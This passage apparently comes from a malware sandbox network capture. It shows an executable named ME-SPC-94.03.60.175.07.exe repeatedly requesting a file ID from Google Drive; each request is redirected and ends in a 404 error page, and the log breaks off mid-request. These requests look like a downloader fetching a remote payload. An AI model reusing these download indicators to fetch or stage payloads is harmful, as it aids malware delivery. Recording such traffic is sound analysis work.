                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Set-Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W; expires=Tue, 17-Jun-2025 17:05:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:05:47 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 63 41 59 49 43 72 36 4a 43 5f 6c 41 42 30 47 68 58 63 6b 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fcAYICr6JC_lAB0GhXckPg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.7 | 49789 | 172.217.19.174 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:05:58 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:05:59 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:05:59 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce-uBi_aIYx94XCDDFF3xHaZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.7 | 49796 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:01 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:02 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC5AtbLVvDemcsOze4UxWAJswKKU1OOMjEFkiL9uXjR3uk8jeFJCbQcre-BIKMhLeRda
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:02 GMT
                                                Cross-Origin-Opener-Policy: same-origin
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce-J99k5bv_o8rfN7NTLMxwag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:02 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 65 33 61 4a 45 51 43 5a 6e 6d 6a 51 6c 31 63 78 6c 2d 74 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9e3aJEQCZnmjQl1cxl-tdQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.7 | 49823 | 172.217.19.174 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:15 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:15 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-FNZ71Kg20dzkieMUq-r4PA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.7 | 49831 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:17 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:18 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC6bPUQknQJR2dLSk1W3xO3cIl_Fhp_FPTg82L3MoHt6MutCEPb0gmAsZ5n-WstE5dvr
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:18 GMT
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-8lSpDq0z_xTdjpSMhC5onw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:18 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 46 55 4a 47 66 58 59 57 32 56 78 4a 4e 6f 79 52 43 68 71 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-FUJGfXYW2VxJNoyRChqoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.7 | 49859 | 172.217.19.174 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:31 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:31 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:31 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-VOad-AKJIsFpwIl_itwx9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.7 | 49865 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:33 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:34 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC41YOb0Gp3cWeY4Rv6wZr2KfNwO8cRr_GaxLXgZUWfKuXKeLUrKpQmvcZ0Ze-ZpUNWZ
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:34 GMT
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy: script-src 'nonce-HFAbTqJA7y5bm2pnrujFuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:34 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 32 48 6e 56 39 46 61 2d 63 32 43 6d 67 53 71 45 32 6e 47 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n2HnV9Fa-c2CmgSqE2nGAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49896 | Destination IP: 172.217.19.174 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:46 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:47 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:47 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-OevyKIYfeM57nKq8hgUZBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49903 | Destination IP: 142.250.181.1 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:06:49 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
